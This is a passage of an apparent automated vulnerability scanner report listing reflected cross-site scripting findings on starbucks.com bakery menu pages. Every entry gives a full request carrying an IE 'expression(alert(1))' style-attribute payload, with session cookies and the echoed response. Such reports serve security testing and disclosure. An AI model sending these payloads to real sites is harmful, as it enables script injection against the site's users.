GET /menu/food/bakery/cinnamon-chip-scone?f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:12 GMT Connection: close Content-Length: 44140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone?f9357"style="x:expression(alert(1))"a5e7a229ce8=1"/> ...[SNIP]...
1.831. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/cranberry-orange-scone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72286"style%3d"x%3aexpression(alert(1))"197c462648b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72286"style="x:expression(alert(1))"197c462648b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/cranberry-orange-scone?72286"style%3d"x%3aexpression(alert(1))"197c462648b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:41 GMT Connection: close Content-Length: 44023
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone?72286"style="x:expression(alert(1))"197c462648b=1"/> ...[SNIP]...
1.832. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/double-chocolate-brownie
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f0b7"style="x:expression(alert(1))"aedb089978d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/double-chocolate-brownie?6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:06 GMT Connection: close Content-Length: 43802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie?6f0b7"style="x:expression(alert(1))"aedb089978d=1"/> ...[SNIP]...
1.833. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/double-fudge-mini-doughnut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1f7a"style="x:expression(alert(1))"12f20aa2559 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:17 GMT Connection: close Content-Length: 43677
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style="x:expression(alert(1))"12f20aa2559=1"/> ...[SNIP]...
1.834. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/double-iced-cinnamon-roll
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c5ac"style="x:expression(alert(1))"518bf21ccf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:51:22 GMT Connection: close Content-Length: 44648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style="x:expression(alert(1))"518bf21ccf8=1"/> ...[SNIP]...
1.835. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/ginger-molasses-cookie
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed67b"style="x:expression(alert(1))"139025d5ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/ginger-molasses-cookie?ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:52:43 GMT Connection: close Content-Length: 43092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie?ed67b"style="x:expression(alert(1))"139025d5ad=1"/> ...[SNIP]...
1.836. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/hawaiian-bagel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c503f"style%3d"x%3aexpression(alert(1))"cd602ede713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c503f"style="x:expression(alert(1))"cd602ede713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/hawaiian-bagel?c503f"style%3d"x%3aexpression(alert(1))"cd602ede713=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:53:13 GMT Connection: close Content-Length: 43576
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/hawaiian-bagel?c503f"style="x:expression(alert(1))"cd602ede713=1"/> ...[SNIP]...
1.837. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/iced-lemon-pound-cake
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddfa4"style="x:expression(alert(1))"a47f474673c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/iced-lemon-pound-cake?ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:52:47 GMT Connection: close Content-Length: 44496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake?ddfa4"style="x:expression(alert(1))"a47f474673c=1"/> ...[SNIP]...
1.838. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef2aa"style="x:expression(alert(1))"36428682d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:54:01 GMT Connection: close Content-Length: 43853
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style="x:expression(alert(1))"36428682d89=1"/> ...[SNIP]...
1.839. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/mallorca-sweet-bread
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea7f1"style="x:expression(alert(1))"a7c7d383e8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/mallorca-sweet-bread?ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:52:40 GMT Connection: close Content-Length: 44079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread?ea7f1"style="x:expression(alert(1))"a7c7d383e8a=1"/> ...[SNIP]...
1.840. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/maple-oat-pecan-scone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d84b"style="x:expression(alert(1))"54ee8af6ce1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/maple-oat-pecan-scone?4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:53:11 GMT Connection: close Content-Length: 43961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone?4d84b"style="x:expression(alert(1))"54ee8af6ce1=1"/> ...[SNIP]...
1.841. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/marble-pound-cake
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd3db"style="x:expression(alert(1))"604a55d7060 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/marble-pound-cake?bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:53:34 GMT Connection: close Content-Length: 43704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marble-pound-cake?bd3db"style="x:expression(alert(1))"604a55d7060=1"/> ...[SNIP]...
1.842. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/marshmallow-dream-bar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d416"style="x:expression(alert(1))"80939aba3c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/marshmallow-dream-bar?2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:54:47 GMT Connection: close Content-Length: 43514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar?2d416"style="x:expression(alert(1))"80939aba3c2=1"/> ...[SNIP]...
1.843. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/morning-bun
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e918"style="x:expression(alert(1))"7d0bd106018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/morning-bun?4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:54:56 GMT Connection: close Content-Length: 43247
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/morning-bun?4e918"style="x:expression(alert(1))"7d0bd106018=1"/> ...[SNIP]...
1.844. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/multigrain-bagel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34ba5"style="x:expression(alert(1))"9c913b552b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/multigrain-bagel?34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
